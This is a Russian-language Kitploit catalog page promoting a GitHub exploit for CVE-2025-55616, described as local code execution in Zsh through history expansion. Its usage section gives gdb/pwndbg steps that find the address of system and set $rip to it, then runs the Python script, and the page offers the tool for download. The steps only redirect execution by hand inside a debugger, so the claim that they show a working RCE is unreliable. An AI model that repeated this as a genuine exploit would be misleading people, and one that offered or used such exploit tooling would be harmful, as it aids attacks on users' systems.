Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55616 — Эксплойт для CVE-2025-55616 — локальное выполнение произвольного кода (RCE) в Zsh через history expression, позволяющее выполнить произвольный код с правами пользователя. | Kitploit
Инструменты/GitHubGitHub/livepwn/cve-2025-55616
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHublivepwn/cve-2025-55616

CVE-2025-55616

Эксплойт для CVE-2025-55616 — локальное выполнение произвольного кода (RCE) в Zsh через history expression, позволяющее выполнить произвольный код с правами пользователя.

Репозиторий
2311 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55616

Автор: Rana M.Sinan Adil

  • Уязвимость, обнаруженная в Zsh, приводящая к RCE через History Expression

Ключевые моменты

Чтобы запустить этот эксплойт: просто измените IP-адрес и "p system" в эксплойте, потому что я также тестировал это на своём втором ноутбуке, и чтобы изменить это, выполните следующую команду в gdb (особенно в pwndbg):

root@kitploit:~
$ gdb zsh -f (в терминале)

pwndbg> run -f

username% ! (username будет вашим, просто напишите ! )

username% !!11111111111 (здесь так же просто напишите  !!11111111111 )

pwndbg> p system

после получения адреса "p system" просто измените его в

следующей строке эксплойта:

root@kitploit:~
b'set $rip =  0x7ffff7cc9110', (используйте ваш адрес p system вместо 0x7ffff7cc9110

Описание

Эта уязвимость позволяет локальным злоумышленникам добиться произвольного выполнения кода (RCE) с привилегиями пользователя, запускающего процесс Zsh.

Использование

root@kitploit:~
python3 CVE-2025-55616.py
Скачать инструмент